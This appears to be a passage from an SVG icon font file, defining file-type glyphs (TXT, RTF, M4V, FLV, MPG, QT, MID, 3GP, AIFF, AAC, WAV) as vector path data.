<glyph unicode="&#xed28;" glyph-name="document-file-txt" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 416v-192h32v192h64v32h-160v-32h64zM640 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM832 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed29;" glyph-name="document-file-txt2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 416v-192h32v192h64v32h-160v-32h64zM640 336l-64-112h32l48 84 48-84h32l-64 112 64 112h-32l-48-84-48 84h-32l64-112zM832 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed2a;" glyph-name="document-file-rtf" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM441.6 320h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640 416v-192h32v192h64v32h-160v-32h64zM800 352v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xed2b;" glyph-name="document-file-rtf2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM441.6 320l64-96h38.4l-64 96c35.361 0.083 64 28.459 64 64 0 35.346-28.605 64-64.156 64h-95.844v-224h32v96h25.6zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640 416v-192h32v192h64v32h-160v-32h64zM800 352v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xed2c;" glyph-name="document-file-m4v" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM464 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM672 320h-57.6l57.6 80v-80zM672 288v-64h32v64h32v32h-32v128h-32l-96-128v-32h96zM848 280l48 168h32l-64-224h-32l-64 224h32l48-168z" />
<glyph unicode="&#xed2d;" glyph-name="document-file-m4v2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM464 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM672 320v80l-57.6-80h57.6zM672 288v-64h32v64h32v32h-32v128h-32l-96-128v-32h96zM848 280l-48 168h-32l64-224h32l64 224h-32l-48-168z" />
<glyph unicode="&#xed2e;" glyph-name="document-file-flv" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM416 352v64h128v32h-160v-224h32v96h96v32h-96zM736 256v-32h-160v224h32v-192h128zM848 280l48 168h32l-64-224h-32l-64 224h32l48-168z" />
<glyph unicode="&#xed2f;" glyph-name="document-file-flv2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM416 352h96v-32h-96v-96h-32v224h160v-32h-128v-64zM736 256v-32h-160v224h32v-192h128zM848 280l48 168h32l-64-224h-32l-64 224h32l48-168z" />
<glyph unicode="&#xed30;" glyph-name="document-file-mpg" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM464 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM576 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM896 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xed31;" glyph-name="document-file-mpg2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM464 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM576 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM896 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xed32;" glyph-name="document-file-qt" d="M597.621 227.752l28.321-28.321 22.627 22.627-24.102 24.102c9.681 11.209 15.533 25.86 15.533 42.029v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c7.645 0 14.978 1.321 21.777 3.752zM569.373 256h-25.406c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-31.994v-96.012c0-7.183-2.332-13.779-6.274-19.093l-43.668 43.668-22.627-22.627 33.941-33.941zM672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM736 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed33;" glyph-name="document-file-qt2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM597.621 227.752c-6.799-2.431-14.132-3.752-21.777-3.752h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-16.169-5.853-30.82-15.533-42.029l24.102-24.102-22.627-22.627-28.321 28.321zM569.373 256h-25.406c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-31.994v-96.012c0-7.183-2.332-13.779-6.274-19.093l-43.668 43.668-22.627-22.627 33.941-33.941zM736 416h-64v32h160v-32h-64v-192h-32v192z" />
<glyph unicode="&#xed34;" glyph-name="document-file-mid" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM496 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM640 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM736 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM768 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xed35;" glyph-name="document-file-mid2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM496 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM640 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM736 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM768 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xed36;" glyph-name="document-file-3gp" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 384c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64 0-19.214-8.37-36.334-21.648-48.021 13.292-11.727 21.648-28.875 21.648-47.979 0-35.593-28.724-64-64.156-64h-31.688c-35.551 0-64.156 28.654-64.156 64h32c0-17.673 14.165-32 31.967-32h32.067c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-32.033v32h32.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.204-31.967-32h-32zM704 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM768 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xed37;" glyph-name="document-file-3gp2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 384h32c0 17.796 14.312 32 31.967 32h32.067c17.801 0 31.967-14.327 31.967-32 0-17.796-14.312-32-31.967-32h-32.033v-32h32.033c17.801 0 31.967-14.327 31.967-32 0-17.796-14.312-32-31.967-32h-32.067c-17.801 0-31.967 14.327-31.967 32h-32c0-35.346 28.605-64 64.156-64h31.688c35.432 0 64.156 28.407 64.156 64 0 19.104-8.356 36.252-21.648 47.979 13.278 11.688 21.648 28.807 21.648 48.021 0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64zM704 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM768 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xed38;" glyph-name="document-file-aiff" d="M608 544h320.236c52.918 0 95.764-42.963 95.764-95.961v-224.078c0-53.009-42.875-95.961-95.764-95.961h-320.236v-64.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-96zM576 128h-320.236c-52.918 0-95.764 42.963-95.764 95.961v224.078c0 53.009 42.875 95.961 95.764 95.961h320.236v64h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v64.211zM416 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM256.115 512c-35.41 0-64.115-28.806-64.115-63.745v-224.511c0-35.205 28.472-63.745 64.115-63.745h671.77c35.41 0 64.115 28.806 64.115 63.745v224.511c0 35.205-28.472 63.745-64.115 63.745h-671.77zM384 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM319.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM480 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM608 352v64h128v32h-160v-224h32v96h96v32h-96zM800 352v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xed39;" glyph-name="document-file-aiff2" d="M608 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-351.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h351.781zM416 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM256.115 512h671.77c35.643 0 64.115-28.539 64.115-63.745v-224.511c0-34.939-28.705-63.745-64.115-63.745h-671.77c-35.643 0-64.115 28.539-64.115 63.745v224.511c0 34.939 28.705 63.745 64.115 63.745zM384 320v-96h32v160c0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64v-160h32v96h96zM319.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM480 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM608 352v64h128v32h-160v-224h32v96h96v32h-96zM800 352v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xed3a;" glyph-name="document-file-aac" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM512 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM447.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM704 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM639.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM928 288c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006z" />
<glyph unicode="&#xed3b;" glyph-name="document-file-aac2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM512 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM447.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM704 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM639.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM928 288c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006z" />
<glyph unicode="&#xed3c;" glyph-name="document-file-wav" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM528 224h-16l-48 96-48-96h-32v224h32v-160l32 64h32l32-64v160h32v-224h-16zM704 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM639.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM848 280l48 168h32l-64-224h-32l-64 224h32l48-168z" />
